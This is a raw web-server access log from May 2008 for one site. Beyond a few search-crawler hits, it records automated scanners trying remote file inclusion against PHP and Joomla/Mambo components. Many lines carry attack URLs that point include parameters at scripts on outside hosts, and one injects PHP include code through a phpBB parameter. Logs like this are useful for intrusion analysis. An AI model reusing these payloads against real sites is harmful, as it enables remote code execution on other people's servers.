74.6.9.58 - - [29/May/2008:09:50:45 -0700] "GET /minamijewelry/flower.psd HTTP/1.0" 200 109558 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.100.12.140 - - [29/May/2008:09:50:55 -0700] "GET /logs/access.log//index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:09:50:56 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.100.12.140 - - [29/May/2008:09:50:57 -0700] "GET //index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.12.140 - - [29/May/2008:09:50:57 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:09:51:01 -0700] "GET /modules/My_eGallery/index.php?basepath=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
62.99.192.29 - - [29/May/2008:09:51:01 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:51:03 -0700] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_virtuemart&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:51:03 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_virtuemart&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:51:04 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_virtuemart&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.209.176 - - [29/May/2008:09:51:09 -0700] "GET /////?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
87.106.209.176 - - [29/May/2008:09:51:09 -0700] "GET /logs/////?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 200 49566 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:09:51:16 -0700] "GET /plus.php?_pages_dir=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:09:51:17 -0700] "GET /plus.php?_pages_dir=http://www.fullscores.com/media/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:09:51:22 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:09:51:24 -0700] "GET /logs/plus.php?_pages_dir=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.208.66.166 - - [29/May/2008:09:51:24 -0700] "GET /logs/plus.php?_pages_dir=http://www.fullscores.com/media/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:51:32 -0700] "GET /logs/access_080327.log/ndex.php?_REQUEST=&_REQUEST%5boption%5d=com_peoplebook&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:51:35 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:09:51:35 -0700] "GET /logs/access_080305.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:51:36 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:51:36 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:51:37 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:09:51:40 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:51:40 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.189.26.170 - - [29/May/2008:09:51:40 -0700] "GET /modules/My_eGallery/index.php?basepath=http://h1.ripway.com/hospenergy/robin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:51:46 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:51:47 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:51:47 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:09:51:51 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:09:51:51 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:09:51:51 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:51:56 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.62.80.134 - - [29/May/2008:09:51:56 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
209.62.80.134 - - [29/May/2008:09:51:56 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:09:52:02 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.139.226 - - [29/May/2008:09:52:03 -0700] "GET /logs/access_080303.log/index.php?pagina=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:52:10 -0700] "GET /logs/access.log/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:52:11 -0700] "GET /errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.60.159.14 - - [29/May/2008:09:52:11 -0700] "GET /logs/errors.php?error=http://isma3.com//comments/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:09:52:21 -0700] "GET /logs/access_080315.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
84.19.176.172 - - [29/May/2008:09:52:30 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.176.172 - - [29/May/2008:09:52:31 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:09:52:44 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.234.21.89 - - [29/May/2008:09:52:44 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:09:52:57 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.167.156.20 - - [29/May/2008:09:52:58 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [29/May/2008:09:52:58 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:09:52:58 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.195.11.193 - - [29/May/2008:09:53:05 -0700] "GET /logs/access_080302.log//trans/trans.php?trans=fr&page=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [29/May/2008:09:53:05 -0700] "GET //trans/trans.php?trans=fr&page=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.195.11.193 - - [29/May/2008:09:53:06 -0700] "GET /logs//trans/trans.php?trans=fr&page=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:53:19 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:53:20 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:53:23 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:53:24 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.21.71.133 - - [29/May/2008:09:53:37 -0700] "GET /logs//main.php?sayfa=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.41 - - [29/May/2008:09:53:38 -0700] "GET /logs/access_080201.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [29/May/2008:09:53:38 -0700] "GET //main.php?sayfa=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.41 - - [29/May/2008:09:53:38 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.41 - - [29/May/2008:09:53:38 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:09:53:49 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:09:53:49 -0700] "GET //include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:09:53:50 -0700] "GET /logs//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:53:54 -0700] "GET /logs/access_080220.log//homepage.php?sel=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:53:54 -0700] "GET //homepage.php?sel=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:53:54 -0700] "GET /logs//homepage.php?sel=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
151.11.24.250 - - [29/May/2008:09:54:13 -0700] "GET /logs//////////index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
151.11.24.250 - - [29/May/2008:09:54:17 -0700] "GET //////////index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://omep.org.ar/boletin/language/bot/mambo.txt??? HTTP/1.1" 200 50 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
66.225.214.96 - - [29/May/2008:09:54:20 -0700] "GET /logs/access_080216.log//homepage.php?sel=http://www.schmid-telecom.com/privz.txt???????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.193.201.57 - - [29/May/2008:09:54:22 -0700] "GET /logs/scripts.log/usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=%22.$ARGV[2].%22&subform[1][cXIb8O3]=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [29/May/2008:09:54:22 -0700] "GET /logs/usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=%22.$ARGV[2].%22&subform[1][cXIb8O3]=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:55:05 -0700] "GET /logs/main.php?x=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:55:05 -0700] "GET /main.php?x=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [29/May/2008:09:55:13 -0700] "GET /logs/index.php?configFile=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [29/May/2008:09:55:16 -0700] "GET /index.php?configFile=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:09:55:20 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.0.211.58 - - [29/May/2008:09:55:24 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.0.211.58 - - [29/May/2008:09:55:24 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.25.134.92 - - [29/May/2008:09:55:33 -0700] "GET /errors.php?error=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.25.134.92 - - [29/May/2008:09:55:42 -0700] "GET /logs/errors.php?error=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:09:55:50 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [29/May/2008:09:55:51 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aviationdimension.com/mediagallery/g2data/sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.86.26.122 - - [29/May/2008:09:56:42 -0700] "GET /logs/access_080215.log//pre_admin.php?site_isp_root=http://www.villeneuvedolmes.com/cmsimple/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.9.36.146 - - [29/May/2008:09:56:47 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.kachina.ie/styll.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.9.36.146 - - [29/May/2008:09:56:47 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.kachina.ie/styll.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:57:03 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:09:57:03 -0700] "GET /logs/access_080329.log/index2.php?content=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:57:06 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:57:08 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:57:09 -0700] "GET /classes/core/language.php?rootdir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:09:57:09 -0700] "GET /index2.php?content=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:57:09 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:57:10 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:09:57:14 -0700] "GET /logs/index2.php?content=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:09:57:15 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.107 - - [29/May/2008:09:57:28 -0700] "GET /logs/access.log HTTP/1.0" 200 121490 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:09:57:34 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:09:57:43 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:09:57:44 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:09:57:44 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:09:57:48 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.180.48.146 - - [29/May/2008:09:57:51 -0700] "GET /logs//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:57:58 -0700] "GET /logs/access_080205.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:57:59 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:09:57:59 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:57:59 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.119.227 - - [29/May/2008:09:58:06 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://imanicm.com/webcalendar/includes/readme? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.72.119.227 - - [29/May/2008:09:58:07 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://imanicm.com/webcalendar/includes/readme? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:09:58:08 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.0.211.58 - - [29/May/2008:09:58:22 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:58:23 -0700] "GET /logs/access_080330.log//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:58:23 -0700] "GET //appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:58:24 -0700] "GET /logs//appserv/main.php?appserv_root=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.0.211.58 - - [29/May/2008:09:58:26 -0700] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
